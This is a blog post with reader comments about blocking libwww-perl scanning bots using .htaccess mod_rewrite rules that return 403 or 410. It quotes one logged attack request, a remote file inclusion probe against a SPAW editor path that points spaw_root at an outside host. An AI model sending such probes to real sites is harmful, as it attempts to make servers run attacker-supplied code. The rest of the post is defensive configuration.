Perl bots crawl my website hundreds of times a month because I have posted about some vulnerabilities here, and those posts show up in Google, which makes the bots think my site is vulnerable. My site is in no danger of being defaced, since I don't run the software they look for. Still, it is quite an annoyance to see hundreds and hundreds of requests that look like this:
/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://xxx? Http Code: 301 Date: Sep 19 18:50:37 Http Version: HTTP/1.1 Size in Bytes: - Referer: - Agent: libwww-perl/5.79
So I added this to my .htaccess file, and poof. They get a 403.
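<IfModule mod_rewrite.c>
# Rewrite rules are ignored unless the engine is switched on.
RewriteEngine On
# Match User-Agent strings that start with "lwp-" or "libwww-".
RewriteCond %{HTTP_USER_AGENT} ^lwp- [OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-
# Leave the URL untouched ("-") and answer with 403 Forbidden.
RewriteRule ^.* - [F,L]
</IfModule>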
You can add any other User-Agents you want to this; I just chose some common ones. If your .htaccess also has something like WordPress permalink redirects set up, this needs to go at the top of the file, so the bots are rejected before the permalink rules handle the request.
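As a rough sketch of how more User-Agents could be added, the separate conditions can be folded into one pattern with alternation. The name "examplebot" below is a made-up placeholder, not a real crawler, and the [NC] flag (case-insensitive matching) is an addition that the original rules do not use.

```apache
<IfModule mod_rewrite.c>
RewriteEngine On
# The two original prefixes plus one hypothetical placeholder ("examplebot"),
# merged into a single pattern. [NC] makes the match case-insensitive.
RewriteCond %{HTTP_USER_AGENT} ^(lwp-|libwww-|examplebot) [NC]
# Match every request, leave the URL untouched, and answer 403 Forbidden.
# [F] implies [L], so no further rules are processed.
RewriteRule ^ - [F]
</IfModule>
```

Each new prefix goes inside the parentheses, separated by a pipe. Keeping the leading ^ means only agents that start with one of the prefixes are blocked.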




October 16th, 2007 at 10:41 pm
Nice one. You could also issue a 410 Gone status with
RewriteRule .* - [R=410,L]
October 17th, 2007 at 5:54 pm
Yeah, that's another good option. This was just an example I came up with after getting frustrated with bots. Now that I think of it, the 410 would probably confuse the bot more, so maybe that would be the better one to use anyway.
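For anyone who wants to try the 410 route, here is a minimal sketch of the same block with the response swapped. It uses mod_rewrite's [G] flag, which is a different spelling from the R=410 form suggested above; it assumes the same two User-Agent prefixes as the post.

```apache
<IfModule mod_rewrite.c>
RewriteEngine On
# Same User-Agent prefixes as in the post.
RewriteCond %{HTTP_USER_AGENT} ^lwp- [OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-
# [G] answers with 410 Gone instead of 403 Forbidden; like [F], it implies [L].
RewriteRule ^ - [G]
</IfModule>
```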